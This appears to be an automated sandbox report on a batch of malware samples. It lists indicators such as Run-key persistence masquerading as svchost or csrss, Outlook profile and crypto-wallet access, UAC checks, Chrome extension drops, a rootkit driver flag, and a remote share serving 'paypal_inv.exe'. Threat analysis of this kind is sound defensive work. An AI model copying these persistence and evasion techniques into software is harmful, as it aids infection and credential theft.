Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 88.80.147.105 N/A N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\WerFault.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uqavfoktdyidm = "C:\\Users\\Admin\\AppData\\Roaming\\qvfbkgpyuen\\irnwgcl.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\ppxsvdjxm.exe\" " C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest131 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest131\\MaxLoonaFest131.exe" C:\Users\Admin\Downloads\2023-11-22-05\595586e83cde2e83072b025e5199b451eed4a290b3cd7640c7e6df90ba364aa3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NwYDfhR = "C:\\Users\\Admin\\AppData\\Roaming\\NwYDfhR\\NwYDfhR.exe" C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NwYDfhR = "C:\\Users\\Admin\\AppData\\Roaming\\NwYDfhR\\NwYDfhR.exe" C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\\svchost.exe.exe" C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hv.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000078001\\hv.exe" C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" \??\UNC\62.173.141.116\scarica\paypal_inv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mirnwgclu = "C:\\Users\\Admin\\AppData\\Roaming\\pyienwscxh\\qmvfajfoxtd.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cpqflwztt.exe\" " C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" \??\UNC\62.173.141.116\scarica\paypal_inv.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DOS Manager = "C:\\Program Files (x86)\\DOS Manager\\dosmgr.exe" C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\\svchost.exe.exe" C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" \??\UNC\62.173.141.116\scarica\paypal_inv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" \??\UNC\62.173.141.116\scarica\paypal_inv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N/A N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N/A N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\pinterests\XRJNZC.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe N/A

Creates a large amount of network flows

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\$RECYCLE.BIN\desktop.ini C:\Program Files\7-Zip\7zG.exe N/A
File opened for modification C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\$RECYCLE.BIN\desktop.ini C:\Program Files\7-Zip\7zG.exe N/A
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File opened for modification \??\G:\$RECYCLE.BIN\S-1-5-21-3811856890-180006922-3689258494-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A
N/A checkip.dyndns.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A api.ipify.org N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RFe683b22.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\d2e9df9c-58b2-49d2-8f75-77aeeb7ee6af.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics.pma C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\LOCK C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db C:\Windows\system32\OpenWith.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\a527e985-f7b0-45f2-a33d-05514db5a087.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000002.dbtmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000001.dbtmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13345225941203629 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\warnStateCache C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db C:\Windows\system32\OpenWith.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db-journal C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe683bbe.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RFe674112.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe67f7ef.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\999f8fe4-4915-4369-bf56-709cb9322cad.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\79eccb47c0d582ce_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RFe679c03.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\de845e8f-5b65-4d9d-a516-fd6402cb018d.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\index C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\bbb706a18101c1d5_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RFe66e8d0.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db C:\Windows\system32\OpenWith.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOCK C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store\LOCK C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
